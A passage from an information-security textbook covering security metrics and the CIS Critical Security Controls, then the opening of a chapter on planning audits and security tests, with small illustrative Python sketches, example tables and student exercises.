16. Ali KM (2012) Digital forensics: best practices and managerial implications. In: 2012 fourth international conference on computational intelligence, communication systems and networks. IEEE Computer Society, pp 196–199. http://ieeexplore.ieee.org
17. Brown CLT (2006) Computer evidence: collection & preservation. Charles River Media, Newton Centre, pp 16–17, 28
18. Cowen D (2013) Computer forensics: InfoSec pro guide. McGraw-Hill, New York, pp 257–282
19. Grama JL (2015) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington, pp 461–488
20. Philipp A, Cowen D, Davis C (2010) Hacking exposed™ computer forensics, 2nd edn. McGraw-Hill, New York, pp 341–368
21. Giles S (2012) Managing fraud risk: a practical guide for directors and managers. Wiley, Chichester, pp 255–293
22. IBM (2021) Cost of a data breach report 2021. IBM, Armonk
23. IBM (2022) Cost of a data breach report 2022. IBM, Armonk
24. ISACA (2021) CISM exam preparation class. Chicago Chapter ISACA, Fall 2021
25. European Union (2018) General data protection regulation (GDPR). https://gdpr-info.eu
26. MasterCard (2019) Account data compromise event management best practices, 26 February 2019
27. Jarrett HM, Bailie MW, Hagen E, Eltringham S (eds) (n.d.) Prosecuting computer crimes. Office of Legal Education, Computer Crime and Intellectual Property Section, Criminal Division. https://www.justice.gov/criminal/file/442156/download
28. Verizon (2022) Verizon 2022 data breach investigations report. https://www.verizon.com/business/resources/reports/dbir
29. Easttom C (2019) System forensics, investigation, and response, 3rd edn. Jones & Bartlett Learning, Burlington
30. Messier R (2017) Network forensics. John Wiley & Sons, Indianapolis
31. ISACA (2021) CISM review class, Chicago Chapter, Fall 2021
32. Visa (2022) What to do if compromised, version 7.0, effective 15 August 2022

Chapter 14

Defining Security Metrics

If we went in with a drone and knocked out a thousand centrifuges, that’s an act of war. But if we go in with Stuxnet and knock out a thousand centrifuges, what’s that? – Richard Clarke, counterterrorism czar for three U.S. presidents [7]

How do you know how well you are doing, unless you have metrics to tell you? Metrics provide decision support in running an organization. When an organization establishes a set of metrics, it gains a realistic baseline, or view, of how it performs at a point in time. Future metrics then determine whether performance improves with new controls. For security organizations, metrics are a way to regularly monitor how well security controls, the security organization, and the organization as a whole are performing relative to security goals. In fact, ISACA’s CISM Review Manual suggests: “Key controls that cannot be monitored pose an unacceptable risk and should be avoided” [p 194, 3].

There are two popular approaches to metrics: business-driven and technology-driven. The business-driven approach states that the business has particular risks, as addressed by risk management, and attention should focus on how well the organization is performing relative to these risks [3]. Thus, metrics inform management (and independent auditors) of the effectiveness of the security program. Business-driven metrics have the advantage that they are tailored to the particular circumstances of the organization, and can be designed to measure adherence to control objectives. One thought worth considering is that monitoring achievement of control objectives is more important than perfecting security procedures. Following this idea, measurement informs us when we have sufficient or inadequate security, and where improvements must be made.

A technology-driven approach to metrics uses security expert consensus and CERT-based data to help understand the current level and types of security threats. The basic idea is: what emerging criminal attacks are we prone to? A tech-driven approach would argue that many incidents go undetected for months and are caught by outside organizations; thus, building a sufficient security baseline is necessary before assuming any metrics are valid. The tech-driven approach to metrics can be a checklist of best-practice goals to attain.

Both approaches are highly relevant and compatible, and both should be used to update risk analysis and drive metrics. The two metric types are discussed in two different sections of this chapter. While metrics are not absolutely necessary for the average small organization, any organization that is subject to regulation (e.g., HIPAA, SOX, FISMA) should take this section very seriously. In fact, most organizations would benefit from a few carefully selected metrics, particularly after a minimum baseline of security is implemented.

Metrics require multiple stages: defining, monitoring, acting on results, and re-evaluating metrics based on changing risks [3].

14.1 Implementing Business-Driven Metrics

Metrics are part of the Monitoring and Compliance function, and help to indicate whether controls and compliance are effective or not. A programmer or system administrator can help to automate the collection of computer-generated metrics. Management monitors a series of metrics, each with different aims [2, 3]:

Key Goal Indicators (KGI)  Management defines strategic goals for the organization and, to determine whether it is achieving these goals, defines and monitors specific metrics. For example, a goal may be regulatory compliance, which requires a defined gap analysis of where we are versus where management defines we should be.

Key Performance Indicators (KPI)  Once a goal is defined, the goal may be broken down into factors or steps to achieve that goal. Measurement of those steps is called a performance indicator.

Key Risk Indicators (KRI)  These are metrics that are highly relevant to monitoring high-priority risks. They are capable of indicating a probability or trend of the actual status of risks [2]. KRIs provide organizations a more accurate guide for the future, enabling them to meet strategic goals. KRIs also enable an evaluation of past performance, allowing organizations to learn about their actual risk appetite.

Business management is not interested in the number of attacks handled by each firewall every week, nor are technical people interested in security cost metrics. Therefore, security metrics can be categorized into three levels, depending on the intended audience [3]. Strategic metrics are of interest to executive management, who are interested in risk (ALE), budget, and policy (e.g., regulatory compliance), as well as major results such as disaster recovery test results. Tactical or management metrics determine the effectiveness of the security program, and include rates of policy compliance/non-compliance and exceptions, incident management effectiveness, and risk changes resulting from system changes. Operational metrics tend to be technical and of interest to the security staff, and include firewall, IDS, or system log analysis, vulnerability test results, and patch management status.

The reporting interval for metrics varies for each metric category. Strategic metrics may be discussed annually or semiannually. Tactical metrics show trends and may be discussed every 6 months or so. Operational metrics are discussed weekly or monthly, and are preferably automated [3].

Business-oriented metrics consider the needs of the business first. This three-step process helps consider the most important threats, how to measure those threats, and how to report on them:

Step 1: What are management’s goals and the most important security risks to monitor in your organization? What threats and compliance requirements are of most concern? Review your risk plan and policies to help define the most important areas to monitor.
Step 2: After listing your most important goals and risks, consider which metrics make the most sense to collect and monitor. Since automated metrics are doable in a busy world, can these metrics be automatically collected?
Step 3: Consider the three perspectives of strategic, tactical, and operational metrics, relative to the three audiences.

Major risks in a university environment include an active shooter, a data breach, a cracking attempt, and a web failure. Metrics developed from these risks are shown in Table 14.1. Starting with a small number of metrics is useful until metrics generation can be automated. Table 14.2 shows sample metrics for various categories of a security program [3, 6]. This list of potentially useful metrics includes cost, program, and risk-oriented metrics.
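As a minimal sketch, a Table 14.1-style metrics catalog could be encoded so that reports can be filtered by audience and reporting interval. All names, fields, and values below are hypothetical, modeled loosely on the table that follows.

```python
from dataclasses import dataclass

@dataclass
class Metric:
    name: str
    level: str            # "strategic", "tactical", or "operational"
    source: str           # calculation & collection method
    period_months: float  # reporting interval

# Illustrative entries modeled on the Einstein University table below.
catalog = [
    Metric("Cost of security/terminal", "strategic", "Information Tech. Group", 12),
    Metric("% employees passing info security quiz", "tactical",
           "Annual email requesting testing", 6),
    Metric("# malware infections", "operational", "Incident Response database", 1),
]

def metrics_for(audience: str) -> list[Metric]:
    """Select the metrics aimed at one of the three audiences."""
    return [m for m in catalog if m.level == audience]

for m in metrics_for("operational"):
    print(f"{m.name}: collect from {m.source} every {m.period_months} month(s)")
```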

Table 14.1  Selected metrics for Einstein University (workbook exercise)

Category | Metric | Calculation & collection method | Period of reporting
Strategic | Cost of security/terminal | Information Tech. Group | 1 year
Strategic | Cost of incidents | Incident Response totals | 6 months
Tactical | % employees passing info security quiz | Annual email requesting testing | 6 months
Tactical | % employees completing info security (& FERPA) training | One annual training with sign-in; performance review for key personnel | 6 months
Tactical | # hours Web unavailable | Incident Response database | 3 months
Operational | # illegal packets in confidential zone | Log management database | 1 week
Operational | # malware infections | Incident Response database | 1 month

14.2 Implementing Technology-Driven Metrics

Technology-driven metrics use defensive techniques to counter known attacks. They are derived by security experts and tend to be operational in nature.

Table 14.2  Example metrics

Risk: the aggregate ALE; % of risk eliminated, mitigated, or transferred; # of open risks due to inaction
Operational performance: time to detect and contain incidents; quantity & severity of incidents; % of systems audited in the last quarter
Technical security architecture: # of malware identified and neutralized; types of compromises, by severity & attack type; attack attempts repelled by control devices; volume of messages (KB) processed by communications control devices
Security management framework: completeness and clarity of security documentation; inclusion of security in each project plan; rate of issue recurrence
Secure software development: rate of projects passing compliance audits; percent of development staff certified in security; rate of teams reporting code reviews on high-risk code in the past 6 months
Cost effectiveness: cost of workstation security per user; cost of email spam and virus protection per mailbox
Organizational awareness: % of employees passing quiz, after training vs. 3 months later; % of employees completing training
Security process monitoring: last date and type of BCP, DRP, and IRP testing; last date asset inventories were reviewed & updated; frequency of executive management review activities compared to planned
Compliance: rate of compliance with regulation or policy; rate of automation of compliance tests; frequency of compliance testing

A highly respected set of controls with metrics is provided by CIS [1], with some interesting metrics from a SANS document [5]. The CIS document is called “CIS Critical Security Controls” [1]. This set of 18 controls was developed to defend against criminal organization attacks and nation-state spying. One goal is to automate metric checks at least weekly, and preferably daily. The summary below outlines minimum requirements, listed in CIS [1] priority order, with some enhancements from other sources.

1. Inventory of Authorized Devices: Ensure all devices on your network are known, configured properly, and recently patched. Everything with an IP address is inventoried and controlled. The inventory shall include: IP address, hardware (e.g., MAC) address, machine name, asset owner, and department [1].
• Tool: Automate network scanning for daily or weekly execution and/or use DHCP reports and passive monitoring. Compare results daily or weekly with known good configurations.
• Metric: Monitor for unauthorized devices weekly (or daily). May test by temporarily placing an unauthorized device on the network [8].
2. Inventory of Authorized and Unauthorized Software: Ensure all software is inventoried, approved, and recently patched. Inventory includes software name, source/publisher, install date, version, deployment mechanism, and applicable license information.
• Tool: Use allowlisting tools, where an allowlist defines the permitted list of software. Endpoint Security Suites (ESS) often contain antivirus, antispyware, firewall, IDS/IPS, and software allow- and blocklisting. A blocklist defines software that is not allowed on specific systems (e.g., IT tools). ESS tools generate alerts if unapproved software is installed.
• Metric: Review inventory allow- and blocklists at least biannually. Inspect for unauthorized software at least monthly [1]. May test by temporarily installing unauthorized software on a device and measuring the delay to find and remove it [8].
3. Management of Protected and Sensitive Data: Define standards for data handling, retention, disposal, access permissions, encryption, logging of accesses, and monitoring of logs.
• Metric: Reevaluate the inventory annually or with significant changes.
4. Secure Configurations for Hardware and Software: All devices are hardened using recommended security configurations (e.g., CIS Benchmarks, NIST checklists). Hardening includes the establishment of patched baselines for software and devices (including network devices). Hardening also includes enabling firewalls, using encryption, session locking and complex passwords, minimizing default accounts, restricting services, and remote wiping of missing devices [1].
• Tools: Build secure images, and use configuration checking tools daily [8].
• Metric: Review secure configurations annually [1]. May test by temporarily attempting to change a set of random configurations and measuring the delay to find and fix them [8].
5. Account Monitoring and Control: Maintain an inventory of valid accounts, including the person’s name, user name, start/expiration dates, and department. Terminated accounts are removed in a timely manner, via account expiration dates, or as a result of logs of expired password accounts, disabled accounts, or locked-out accounts. Passwords are unique. Avoid using system admin accounts for non-admin work [1].
• Tools: Operating system tools to generate alerts for the above conditions should be enabled.
• Metric: Review accounts quarterly for validity [1]. A list of valid user accounts is collected daily; an alert or email is generated for unusual changes [8].
6. Controlled Access Based on Need to Know: Data classification schemes and logging access to confidential data help prevent exfiltration of data to potential competitors. Separate accounts are used for email/web access versus privileged access (e.g., administrator). Multifactor authentication is used, particularly for privileged or admin accounts [1].
• Tools: Fine-tuned authentication, role-based access control, multifactor authentication, and network zoning.
• Metric: Unauthorized accesses generate an alert within 24 h, or preferably less [8]. Revoke or disable terminated accounts within a limited time frame [1].
7. Continuous Vulnerability Assessment and Remediation: Vulnerabilities are published regularly (e.g., through CVE, CCE, CPE). It is critical to learn which of your software and devices are susceptible to published vulnerabilities, and to correct them before criminals exploit them [1]. Run vulnerability scans on all systems at least weekly [8]. Problem fixes are verified through additional scans.
• Tools: Vulnerability scanning tools, which are kept updated: wireless, server, endpoint, etc.
• Metric: Review the vulnerability scanning plan annually [1]. Perform patch management at least monthly [1]. Vulnerability notification(s) are emailed within 1 h of completion of a vulnerability scan [8].
8. Management of Audit Logs: Logs are important to detect attacks and to forensically analyze attacks. Logs include system logs, which report on OS and network events, and audit logs, which report on user events and transactions. Logs are write-only, forwarded to a centralized log server, and archived for at least 90 days [1].
• Tools: Logs are verbose, and 90 days’ worth of space is allocated for them. SIEM tools help in analyzing alerts.
• Metric: To test, ensure that the centralized log server is receiving logs from each inventoried device periodically. Log specifications are inspected annually. Time synchronization ensures log timestamps are consistent across devices. Logs are reviewed at least weekly or more frequently [1].
9. Email and Web Browser Protections: One primary method for criminals to enter an organization is through malware or social engineering, using email and the web. Criminals abuse vulnerabilities within browsers and browser plug-ins. Therefore, it is crucial that browser software remains supported and patched, and that pop-ups are disabled [1]. Users should be trained to recognize and report phishing attempts.
• Tools: To protect email, tools can restrict spam, scan for malware, and restrict uncommon file type extensions. To protect web accesses, block potentially dangerous websites.
• Metric: Periodically ensure blocked websites remain blocked. Test that unauthorized browsers are found and removed. Periodically ensure that unauthorized file types are removed within email [1].

10. Malware Defenses: Malware is used to steal or destroy data, capture credentials, traverse organizational networks, etc. Antivirus/antispyware is updated and run against all data, including shared files, server data, and removable media. Antivirus software is managed centrally and logs inappropriate actions or attacks [1]. Additional controls to consider include blocking social media, limiting external devices (e.g., USB), using web proxy gateways, and monitoring networks [5].
• Tools: Anti-malware or endpoint security suites, which have the additional capability of reporting that the tool is updated and activated on all systems [8].
• Metric: If installation of benign malware (e.g., a security/hacking tool) is attempted, antivirus either prevents installation or execution or quarantines the software, and then sends an alert or email report within 1 h of installation [8]. Anti-malware is installed on all organizational devices, and software automatically updates itself within a set timeframe [1].
11. Data Recovery Capability: Criminals can alter configurations, programs, or data, or demand ransoms, making data unavailable or untrustworthy. Backups are performed at least weekly, and more often for critical data. Backups are encrypted and securely stored. Multiple staff can perform backup/recovery [8].
• Metric: Test backups (at least) quarterly for a random sample of systems. This includes operating system, software, and data restoration. The recovery documentation is reviewed annually and with changes. Backups are run weekly or more frequently [1].
12. Secure Configurations for Network Devices: Default configurations are designed for ease of use, and must be re-configured for security [1]. A configuration database tracks approved configurations in configuration management for network devices, including firewalls, wireless access points, routers, and switches. Communications protocols shall be of recent versions and use encryption. Network software is patched, and end-of-life devices are upgraded or given mitigating controls [1]. Multifactor authentication is required for controlling network devices; login to an authentication server is required to access VPN or organizational devices.
• Tools: Tools can perform rule set sanity checking for network filter devices, which use Access Control Lists. Network devices should implement segmentation [8].
• Metric: The network architecture is fully documented and updated at least annually or as the network changes [1]. To test, any change to the configuration of a network device is recognized within 24 h [8].
13. Network Attack and Log Monitoring: Because criminals are often in an organization’s networks for months before discovery, it is important to be able to detect and track attacks. Building up threat intelligence skills includes learning to recognize and document attacker techniques. Recognition of threats via Security Information and Event Management (SIEM), and automatic handling of threats via an Intrusion Prevention System (IPS), is beneficial, but event thresholds must be tuned at least monthly. Filtering between network zones is required to segment networks.
• Tools: If in-house intrusion detection is not possible, security consultants or a managed service provider should be hired. HIDS/HIPS, NIDS/NIPS, and application layer firewalls or proxies can catch attacks, and a centralized log analysis tool, like a SIEM, can aid in analyzing logs [1]. Automate port scanning for daily or periodic execution, monitoring for open services and versions of those services. Wireless IPSs detect available wireless access points and deactivate rogue access points. Vulnerability scanners can detect unauthorized wireless access points connected to the Internet [8].
• Metric: Compare port scanning results daily with known good configurations. To test, temporarily place a secure test service randomly on the network, which will respond to network requests [8]. The system can detect a rogue access point or unauthorized device within 1 hour or 1 day.
14. Security Awareness Skills Training: Security awareness training is required for all end users; however, executive management often handles more proprietary information, system administrators have privileged system access, and finance, contracts, and human resources have specialized access to information or money [1]. Software developers also should be aware of safe programming practices [8].
• Tools: Annual training and phishing tests [1] (in addition to Chap. 1, also see NIST SP800-50, National Cyber Security Centre, National Cyber Security Alliance, or SANS).
• Metric: Update social engineering training annually [1]. Test security awareness understanding in training; attempt periodic social engineering tests using phishing emails and phone calls [8].
15. Management of Service Providers: Most organizations use third-party agreements to implement various services; these providers may in turn use other parties. Contracts with providers should ensure specific security, privacy, and regulatory controls and requirements, monitoring provisions, incident response, and contract termination clauses, including data disposal [1].
• Tools: Third-party assessment platforms can evaluate a service provider’s technical assessment and risk rating [1].
• Metrics: Annual review of the service provider inventory. Annual review of contractor certifications and performance [1].
16. Application Software Security: Attackers attack through password credentials, application vulnerabilities, or network/system hacking. Design includes threat modeling. New application software is tested for security vulnerabilities, including buffer overflow, SQL injection, cross-site scripting, cross-site request forgery, clickjacking, field overflows, and performance during DDoS attacks [8]. Standardized OS utilities include identity management, encryption, and logging that reports error messages to the log system [1]. Configuration requirements include application firewalls and hardened databases or application infrastructure. Developer and production environments are separated.
• Tools: Automated testing includes static code analyzers, automated web scanning tools, and automated database configuration review tools; security training for programmers [8]. Developer standards include secure application design and coding standards, change control tools, and a software defect severity rating system [1].
• Metric: An attack on the software generates a log or email within 24 h (or less). Automated web scanning occurs weekly or daily. When errors are found, they are fixed within 15 days [5]. Annual review of the inventory of third-party software [1]. Annual security training for developers.
17. Incident Response and Management: An Incident Response Plan defines which roles should perform what under various conditions [8]. Threat intelligence and/or threat hunting can enable a team to be proactive in detecting attacks [1].
• Tools: Incident response plan; communication plan (during a security incident).
• Metrics: Annually review the incident response plan and personnel roles (i.e., incident management team, incident response team, emergency contact list, training to report incidents) [1]. Perform incident response testing at least annually. Update thresholds distinguishing events from incidents at least annually or when significant changes occur. Perform post-incident reviews to update documentation on an as-needed basis.
18. Penetration Testing: Penetration tests are useful for control validation (proper operation of controls), for control verification (that controls are designed sufficiently to meet needs), or to demonstrate proof of inadequacy of controls. Penetration testing is usually performed by expert outsiders to determine the level to which vulnerabilities can be exploited [1]. An internal penetration test program evaluates what penetration testing should occur for various aspects of the organization. Pen test results are remediated.
• Tools: Expert consultants often manually use custom scripts. Rules of engagement specify the testing times, duration, and overall test approach [1].
• Metric: Perform external pen testing at least annually; perform internal pen testing at least annually [1].

Further details on these 18 recommended controls can be found in the CIS Critical Security Controls at www.cis.org. Many measures tend to be pass-fail tests. It is expected that time durations for vulnerability and other checks would be set to what an organization can accomplish, and that durations would be reduced to safer intervals when possible. Advanced organizations should shorten timeframes to 24 h or less. Analyzing incident response performance in more depth would include statistics such as the ‘number of compromised systems’ and ‘mean time to detection’ [9]. If fraud is a factor in your organization, fraud-related statistics include [4]:


• False alarm rate or false positive rate: percent of legitimate transactions that are incorrectly interpreted as fraudulent. • False negative rate: percent of fraudulent transactions that are incorrectly interpreted as legitimate. • Fraud catching rate or true positive rate: percent of fraudulent transactions that are correctly recognized as fraudulent.
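These rates follow directly from the four outcome counts of a fraud-detection control. A minimal sketch, with invented counts for illustration:

```python
def fraud_rates(tp: int, fp: int, tn: int, fn: int) -> dict[str, float]:
    """Compute the fraud-detection rates defined above from raw counts.

    tp: fraudulent transactions flagged as fraudulent
    fp: legitimate transactions flagged as fraudulent (false alarms)
    tn: legitimate transactions passed as legitimate
    fn: fraudulent transactions passed as legitimate
    """
    return {
        "false_alarm_rate": fp / (fp + tn),     # share of legitimate flagged
        "false_negative_rate": fn / (fn + tp),  # share of fraud missed
        "fraud_catching_rate": tp / (tp + fn),  # share of fraud caught
    }

# Example: 10,000 legitimate and 50 fraudulent transactions.
print(fraud_rates(tp=40, fp=200, tn=9_800, fn=10))
```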

14.3 Questions and Problems

1. Business-Driven Metrics for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook Metrics Chapter to complete the three questions and one table. For each table, include two or more metrics for each of the strategic, tactical and operational levels.

(a) Step 1 Question: What are the most important security areas to monitor in this organization? What threats and regulations are of greatest concern? Review risk results and policies to help define the most important areas to monitor.
(b) Step 2 Question: After listing the most important threats, consider which metrics make the most sense to collect. Since automated metrics are doable in a busy world, is there an easy way to collect these metrics?
(c) Step 3 Question: Consider the three perspectives of strategic, tactical and operational metrics, relative to the three audiences.
(d) Create a ‘Metrics’ Table, similar to Table 14.1.

2. Tech-Driven Metric Alerts. Review the technology-driven metrics requirements for alerts or emails to be generated. Prepare a list of the required alerts/emails to be fully compliant with the top-18 CIS controls. Then put a check next to the metrics you think would be most important for your company.

3. Regulation relating to Metrics. Consider one of the following security regulations or standards: PCI DSS, the EU’s GDPR, or the USA’s HIPAA, Gramm–Leach–Bliley, Sarbanes–Oxley, or FISMA. What metrics may help in monitoring for compliance? Develop five metrics that will help test for regulatory compliance. Websites that provide government- or standards-based information as authentic sources include:

(a) PCI DSS: Access information from https://www.pcisecuritystandards.org/security_standards/. Select the PCI DSS standard. Skim the “Detailed PCI DSS Requirements and Testing Procedures” (starting on page 37 of version 4.0).
(b) General Data Protection Regulation: Chap. 17 of this text or https://gdpr-info.eu.




(c) HIPAA/HITECH: Chap. 15 of this text or www.hhs.gov (Health and Human Services); search for HIPAA.
(d) Gramm–Leach–Bliley and Red Flags Rule: Federal Trade Commission: http://www.business.ftc.gov/privacy-and-security
(e) Sarbanes–Oxley: www.isaca.org (organizations for standards/security). Your instructor may provide ‘Information Security Student Book: Using COBIT®5 for Information Security’, available at www.isaca.org. Additional information is at www.sans.org; search for ‘COBIT’.
(f) FISMA: www.nist.gov (National Institute of Standards and Technology); search for FISMA. Specific link: http://www.nist.gov/itl/csd/soi/fisma.cfm. Access FIPS Publication 200 first.

14.3.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

Case study | Health First case study | Other resources
Defining security metrics | ✓ | Security Workbook
Defining security metrics (optional): designing metrics for the requirements doc | ✓ | Health First requirements doc

References

1. CIS (2021) CIS Critical Security Controls®, version 8, May 2021. Center for Internet Security
2. ISACA (2012) CRISC™ review manual 2013. ISACA, Arlington Heights, pp 100–101
3. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights
4. Kou Y, Lu C-T, Sirwonwattana S, Huang Y-P (2004) Survey of fraud detection techniques. In: IEEE international conference on networking, sensing & control. IEEE, pp 749–753. http://ieeexplore.ieee.org
5. McMillan A (2013) Funding your programs through smart risk and security management. In: SC congress Chicago, 20 November 2013
6. Open Web Application Security Project (OWASP) (2014) Software assurance maturity model, ver 1.0. http://www.opensamm.org/downloads/SAMM-1.0.pdf. Accessed 15 Nov 2014
7. Rosenbaum R (2012) Cassandra syndrome. Smithsonian 43(1):15
8. SANS (2013) Critical controls for effective cyber defense, ver 4.1, March 2013. www.sans.org
9. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise.com/DBIR/2013. Accessed 20 Oct 2013

Chapter 15

Performing an Audit or Security Test

My crime is that of outsmarting you, something that you will never forgive me for. – The Mentor (hacker) [1]

Compliance means that the organization and its actors adhere to applicable regulation and organizational policy and standards. Auditors are professional evaluators who test for compliance and/or that certain objectives are met. Therefore, understanding audit techniques professionalizes testing, whether it is done for test or audit purposes. The Certified Information Systems Auditor (CISA) definition of audit is [2]:

Systematic process by which a qualified, competent, independent team or person objectively obtains and evaluates evidence regarding assertions about a process for the purpose of forming an opinion about and reporting on the degree to which the assertion is implemented.

Each of these words was carefully selected. The qualified, competent, independent team or person means that the auditor is competent and knowledgeable in the specific audit task that is being evaluated. Professional independence means the auditor is independent in “fact and appearance” as regarded by any typical third party [3]. This tends to mean that the auditor is not related to, has no financial ties to, is not close friends with, and does not date, flirt, party, or normally associate with the individuals being audited. Organizational independence means that the auditor and the auditing company do not have any special financial ties to the organization being audited. Objectively obtains and evaluates evidence means that the auditor must obtain and analyze objective, reliable, qualified, and proven facts. Sources of evidence should include internal documentation, external letters, contracts, interview notes from qualified persons, electronic data, and test results. Assertions about a process implies that the auditor cannot certify that no transaction is fraudulent, but is analyzing the process to ensure that precautions have been taken to minimize fraud and implement sufficient controls. Assertions are the claims that management is making about the integrity of its process [3]. Forming an opinion about and reporting on concerns the final result: an assessment report, which depends upon expertise and facts to express a realistic, accurate view as to the validity of the process.


Auditing/testing can be classified by levels: internal testing, internal audit and external audit. Internal testing occurs when a security group or quality control tests their own security controls. Internal audit occurs when an organization has an audit group, separate from IT/security, which performs in-house auditing of the IT/security and business departments. This internal process prepares an organization for an external audit. The internal audit group is authorized by an audit charter, which describes the group’s responsibility, accountability and authority. The charter outlines management’s responsibility, audit’s reporting hierarchy (to top management) and is signed off by the highest levels of management [2]. The main purposes of audit are to measure conformance to policy, standards and regulation, and to evaluate organizational risk [4]. PCI DSS requires limited auditing, as described later. In the U.S., external audits are required by FISMA and Sarbanes-Oxley for corporations, and are recommended for nonprofits. During an external audit for SOX, an independent audit organization formally reviews the internal controls and the integrity of an organization’s financial statements in order to report the organization’s efficacy to external stakeholders (e.g., shareholders of a corporation) [5]. This chapter includes two major sections: the first section is on internal testing or informal audit and the second on external or professional audit. Much of professional auditing is useful knowledge, even for internal testing and auditing. Therefore, the section on professional audits builds on the first section on internal testing/audit, which incorporates simpler audit ideas.

15.1 Testing Internally and Simple Audits

In a perfect world, an organization would thoroughly test all systems in an automated fashion. However, this is rarely possible. Therefore, shortcuts that make the best use of the auditor’s test time include scheduling, random sampling, priority [2], and automation. Scheduling is useful to evaluate different components of the organization in different quarters or years; all important sectors or systems get tested eventually, just not this year. Scheduling and priority should be considered for all test and audit planning. Factors for short-term planning (i.e., this year) include [2]:

• Risk: Some aspects of business are more susceptible to risk or have recently changed;
• Regulation: Conformance to regulation is high priority, particularly if regulatory requirements have recently changed;
• Tools: New or reconfigured evaluation tools demand testing.

The tests that cannot be accomplished this year can be scheduled for future years, as part of a long-term plan. Table 15.1 shows a short-term audit plan for Einstein University. Timeframes are given in quarters (Q). The date of last test helps to determine the priority. The Responsibility column allocates accountability for the test, and indicates where external consultants will be used. This audit plan should be updated and discussed with upper management annually [6].

Table 15.1  Audit plan schedule (workbook exercise)

Audit area | Timeframe | Date of last test | Responsibility
Policies & Procedures for Registration, Advising | 1Q | Never | Internal auditor
PCI DSS audit | 2Q | 2024 | CIO, Security consultant
FERPA: Personnel interviews | 3Q | Never | Internal auditor
IT: Penetration Test | 4Q | 2023 | CIO, Security consultant
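The scheduling, priority, and random-sampling shortcuts described above can be combined by weighting components by risk, so that higher-risk items are drawn for testing more often. A minimal sketch, with hypothetical component names and weights:

```python
import random

# Hypothetical components to audit; a higher weight reflects higher risk,
# so the component is sampled more often.
components = {
    "registration database": 5,   # FERPA-protected data
    "payment gateway": 5,         # PCI DSS scope
    "campus wiki": 1,
    "print servers": 1,
}

def quarterly_sample(k: int, seed: int | None = None) -> list[str]:
    """Draw k components for this quarter's tests, weighted by risk.

    Sampling is with replacement, so a high-risk component may be
    selected (and therefore tested) more than once.
    """
    rng = random.Random(seed)
    names = list(components)
    weights = [components[n] for n in names]
    return rng.choices(names, weights=weights, k=k)

print(quarterly_sample(3, seed=42))
```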

An Audit Engagement is a specific audit task, such as one row in the Audit Plan [7]. The steps of a risk-based audit include [8]:
1. Gather Information, Plan Audit: Learn about the organization, assess risk, and prepare the audit plan.
2. Review the Design of Internal Controls: Determine on paper whether the design of controls is effective to achieve management assertions or policy claims.
3. Perform Compliance and Substantive Tests: Validate that the controls are effective and that business transactions are processed properly.
4. Prepare and Present Report: Write an audit report and present it to agreed-upon parties.
These four steps are covered in the next four subsections. A more detailed diagram of functions is shown in Fig. 15.1, an Activity Diagram (or flow chart) of the audit engagement process. To read the diagram, start at the top left bullet and follow the arrows. The left column represents the first two steps of the four-step audit process. The two thick vertical lines indicate that the lighter-colored middle processes occur in parallel and (usually) complete before the right column begins. The two dark processes on the bottom right are part of the fourth step: Prepare and Present Report.

15.1.1 Step 1: Gathering Information, Planning the Audit

The first goal is to understand the business environment, particularly related to the scope of the audit. This may include touring the facilities, reading background material, and reviewing business and IT strategic plans. What regulation must the organization adhere to? To learn about previous problems, the auditor should review previous audit reports and consider inherent risks that are common to the industry. Interviewing key managers will help in understanding the business and the areas that are outsourced. Having a good grasp of the business environment will enable the auditor to understand the big picture and fit details into context, regardless of whether an internal or external audit is being performed.


Fig. 15.1  Activity diagram of the audit engagement process

The Engagement Letter normally describes the objectives and scope of the audit, as well as the set of deliverables, assigned responsibility and authority, budget, timeline, and who the audit report will go to [3]. The Audit Subject is the area to be audited, e.g., “Information Systems related to Sales”. The Audit Objective is the purpose of the audit, such as: “Determine whether the Sales database is secure against data breaches, due to inappropriate authentication, access control, or hacking” or “Confirm adherence to regulation X”. The Audit Scope constrains the audit to a specific system, function, unit, or period of time, such as: “The scope is constrained to headquarters for the last year”. This document focuses the audit, and defines the beginning part of the Audit Engagement Plan.

The risk-based auditing approach considers what risks might result in a business disturbance, such as a financial loss, a regulatory infraction, a business interruption, and/or a loss of public trust. As a result of this risk analysis, the auditor can set priorities to focus the audit and determine how problems might be categorized into different significance levels (e.g., Material Weakness versus a Deficiency) [7]. Risk-based auditing considers the overall audit risk: the risk that the audit may not find significant deficiencies that do exist [6]. Audit risk includes the inherent risks, control risks, and detection risks for a company [2]. Inherent Risk addresses problems that certain companies, industries, or components tend to be prone to. For example, a bank’s inherent risk is a robber, and a school’s inherent risk is student hacking and open systems. Control Risks are vulnerabilities that internal controls fail to safeguard against. An example of a control risk would be an IPS that does not catch a proprietary file exfiltration. A Detection Risk could occur when an auditor does not detect a problem that does exist; for example, insufficient segregation of duties results in fraud, but is not caught by an auditor. Risk is considered relative to the business, technological factors, national environment, contractual issues, and project [3].

Once risks are considered, the audit engagement plan (or test plan) can be developed [3]. At a minimum, the audit objective, audit scope, and audit approach should be defined. The Constraints section may list limitations imposed to safeguard the auditor or auditee, such as requirements to execute high-volume tests during low-volume times, specify auditor requirements for assistance, or notify the security department before using hacking tools. The Compliance and Criteria section describes the regulation, external standards/guidelines (e.g., industry best practice, security standards, audit frameworks), and/or organizational policy that will be used as a benchmark for the audit. The Risk Analysis section summarizes the evaluated risk, including where the ‘gold’ lies in the area under test and the high-risk activities within this network. The Audit Approach lists the high-level methodology or summary strategy of the testing that will occur. An optional Checklist provides a detailed list of tests or actions to be taken. The checklist is useful as part of a test plan or internal audit, to carefully plan the detailed audit and to get specific permission for all planned security activities [4]. An ethical hacking tester may use vulnerability, scanning, sniffer, and other hacking tools, as well as social engineering techniques [10]. An auditor may in addition or alternatively analyze documentation or audit logs, interview or observe personnel, flowchart applications, and/or use general audit software to generate and perform tests [2]. The audit plan checklist should be detailed, describing, for example, who will be interviewed and the specific required documentation.

